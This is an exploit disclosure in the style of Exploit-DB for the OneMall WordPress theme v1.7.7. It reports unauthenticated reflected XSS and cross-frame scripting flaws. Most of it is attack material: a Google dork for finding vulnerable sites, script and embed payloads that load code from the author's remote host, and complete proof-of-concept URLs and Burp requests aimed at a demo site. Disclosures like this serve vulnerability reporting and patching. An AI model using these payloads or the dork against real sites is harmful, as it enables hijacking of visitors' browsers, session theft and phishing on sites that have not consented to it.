[+] :: Exploit Title: OneMall WordPress theme v1.7.7 - Unauthenticated Reflected XSS & XFS [+] :: Google Dork: inurl:/wp-content/themes/onemall/ [+] :: Date: 2020-10-20 [+] :: Exploit Author: Ex.Mi [ https://ex-mi.ru ] [+] :: Vendor: MAGENTECH [ https://www.magentech.com ] [+] :: Software Version: 1.7.7 [+] :: Software Link: https://themeforest.net/item/onemall-the-multipurpose-ecommerce-marketplace-wordpress-theme/20685400 [+] :: Tested on: Kali Linux [+] :: CVE: [+] :: CWE: CWE-79, CWE-1021 [i] :: Info: An Unauthenticated Reflected XSS & XFS vulnerabilities was discovered in the OneMall theme v1.7.7 for WordPress. [$] :: Payloads: "><script src=https://ex-mi.ru/payload/a2r.js></script> "><embed src=https://ex-mi.ru/payload/xfsii.html> [!] :: PoC Unauthenticated Reflected XSS: https://demo.wpthemego.com/themes/sw_onemall/layout2/?category=&s=%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fex-mi.ru%2Fpayload%2Fa2r.js%3E%3C%2Fscript%3E&search_posttype=product [!] :: PoC Unauthenticated Reflected XSS (Burp Suite): GET /themes/sw_onemall/layout2/?category=&s=%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fex-mi.ru%2Fpayload%2Fa2r.js%3E%3C%2Fscript%3E&search_posttype=product HTTP/1.1 Host: demo.wpthemego.com [!] :: PoC Unauthenticated XFS: https://demo.wpthemego.com/themes/sw_onemall/layout2/?category=&s=%22%3E%3Cembed+src%3Dhttps%3A%2F%2Fex-mi.ru%2Fpayload%2Fxfsii.html%3E&search_posttype=product [!] :: PoC Unauthenticated XFS (Burp Suite): GET /themes/sw_onemall/layout2/wp-admin/admin-ajax.php?action=sw_search_products_callback&limit=5&search_type=0&query=%22%3E%3Cembed+src%3Dhttps%3A%2F%2Fex-mi.ru%2Fpayload%2Fxfsii.html%3E HTTP/1.1 Host: demo.wpthemego.com [@] :: Contacts: Website: ex-mi.ru Telegram: @ex_mi GitHub: @ex-mi Medium: @ex-mi